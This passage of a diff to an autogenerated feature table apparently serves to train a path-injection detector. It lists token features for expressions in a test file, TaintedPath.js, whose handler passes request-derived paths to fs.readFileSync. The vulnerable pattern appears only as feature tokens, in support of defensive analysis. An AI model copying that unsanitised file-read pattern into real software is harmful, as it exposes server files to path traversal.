autogenerated/TaintedPath/TaintedPath.js:155:19:155:31 | prefix.concat | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | exceptional return of prefix.concat(split) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | exceptional return of prefix.concat(split) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | exceptional return of prefix.concat(split) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | exceptional return of prefix.concat(split) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | exceptional return of prefix.concat(split) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | prefix.concat(split) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | prefix.concat(split) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | prefix.concat(split) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | prefix.concat(split) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:155:19:155:38 | prefix.concat(split) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:155:26:155:31 | concat | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:26:155:31 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:155:26:155:31 | concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:155:26:155:31 | concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:155:26:155:31 | concat | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:155:33:155:37 | split | CalleeFlexibleAccessPath | prefix.concat | | autogenerated/TaintedPath/TaintedPath.js:155:33:155:37 | split | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:155:33:155:37 | split | contextFunctionInterfaces | views_local(req, res) | @@ -5900,6 +63341,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:155:33:155:37 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:155:33:155:37 | split | receiverName | prefix | | autogenerated/TaintedPath/TaintedPath.js:155:33:155:37 | split | stringConcatenatedWith | prefix -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:4 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:4 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:17 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:17 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | exceptional return of fs.read ... n("/")) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | exceptional return of fs.read ... n("/")) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | exceptional return of fs.read ... n("/")) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | exceptional return of fs.read ... n("/")) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | exceptional return of fs.read ... n("/")) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | fs.read ... n("/")) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | fs.read ... n("/")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | fs.read ... n("/")) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | fs.read ... n("/")) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:156:3:156:38 | fs.read ... n("/")) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:156:6:156:17 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:6:156:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:6:156:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:156:6:156:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:156:6:156:17 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:27 | concatted | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:27 | concatted | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:27 | concatted | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:27 | concatted | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:27 | concatted | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:32 | concatted.join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:32 | concatted.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:32 | concatted.join | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:32 | concatted.join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:32 | concatted.join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | concatted.join("/") | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | concatted.join("/") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | concatted.join("/") | calleeImports | fs | @@ -5909,6 +63385,16 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | concatted.join("/") | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | concatted.join("/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | concatted.join("/") | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | exceptional return of concatted.join("/") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | exceptional return of concatted.join("/") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | exceptional return of concatted.join("/") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | exceptional return of concatted.join("/") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:156:19:156:37 | exceptional return of concatted.join("/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:156:29:156:32 | join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:29:156:32 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:156:29:156:32 | join | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:156:29:156:32 | join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:156:29:156:32 | join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:156:34:156:36 | "/" | CalleeFlexibleAccessPath | concatted.join | | autogenerated/TaintedPath/TaintedPath.js:156:34:156:36 | "/" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:156:34:156:36 | "/" | contextFunctionInterfaces | views_local(req, res) | @@ -5917,6 +63403,47 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:156:34:156:36 | "/" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:156:34:156:36 | "/" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:156:34:156:36 | "/" | receiverName | concatted | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:16 | concatted2 | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:16 | concatted2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:16 | concatted2 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:16 | concatted2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:16 | concatted2 | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatt ... prefix) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatt ... prefix) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatt ... prefix) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatt ... prefix) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatt ... prefix) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatted2 | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatted2 | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatted2 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatted2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:158:7:158:39 | concatted2 | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:24 | split | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:24 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:24 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:24 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:24 | split | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:24 | split | stringConcatenatedWith | -endpoint- prefix | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:31 | split.concat | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:31 | split.concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:31 | split.concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:31 | split.concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:31 | split.concat | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | exceptional return of split.concat(prefix) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | exceptional return of split.concat(prefix) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | exceptional return of split.concat(prefix) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | exceptional return of split.concat(prefix) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | exceptional return of split.concat(prefix) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | split.concat(prefix) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | split.concat(prefix) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | split.concat(prefix) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | split.concat(prefix) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:158:20:158:39 | split.concat(prefix) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:158:26:158:31 | concat | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:26:158:31 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:158:26:158:31 | concat | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:158:26:158:31 | concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:158:26:158:31 | concat | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:158:33:158:38 | prefix | CalleeFlexibleAccessPath | split.concat | | autogenerated/TaintedPath/TaintedPath.js:158:33:158:38 | prefix | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:158:33:158:38 | prefix | calleeImports | url | @@ -5927,6 +63454,41 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:158:33:158:38 | prefix | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:158:33:158:38 | prefix | receiverName | split | | autogenerated/TaintedPath/TaintedPath.js:158:33:158:38 | prefix | stringConcatenatedWith | split -endpoint- | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:4 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:4 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:4 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:4 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:17 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:17 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:17 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:17 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | exceptional return of fs.read ... n("/")) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | exceptional return of fs.read ... n("/")) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | exceptional return of fs.read ... n("/")) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | exceptional return of fs.read ... n("/")) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | exceptional return of fs.read ... n("/")) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | fs.read ... n("/")) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | fs.read ... n("/")) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | fs.read ... n("/")) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | fs.read ... n("/")) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:159:3:159:39 | fs.read ... n("/")) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:159:6:159:17 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:6:159:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:6:159:17 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:159:6:159:17 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:159:6:159:17 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:28 | concatted2 | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:28 | concatted2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:28 | concatted2 | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:28 | concatted2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:28 | concatted2 | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:33 | concatted2.join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:33 | concatted2.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:33 | concatted2.join | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:33 | concatted2.join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:33 | concatted2.join | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | concatted2.join("/") | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | concatted2.join("/") | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | concatted2.join("/") | calleeImports | fs | @@ -5936,6 +63498,16 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | concatted2.join("/") | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | concatted2.join("/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | concatted2.join("/") | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | exceptional return of concatted2.join("/") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | exceptional return of concatted2.join("/") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | exceptional return of concatted2.join("/") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x fs readFileSync prefix split x concatted prefix concat split fs readFileSync concatted join / concatted2 split concat prefix fs readFileSync concatted2 join / fs readFileSync split pop | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | exceptional return of concatted2.join("/") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:159:19:159:38 | exceptional return of concatted2.join("/") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:159:30:159:33 | join | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:30:159:33 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:159:30:159:33 | join | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path split path split / fs readFileSync split join / fs readFileSync prefix split split length 1 fs readFileSync split x 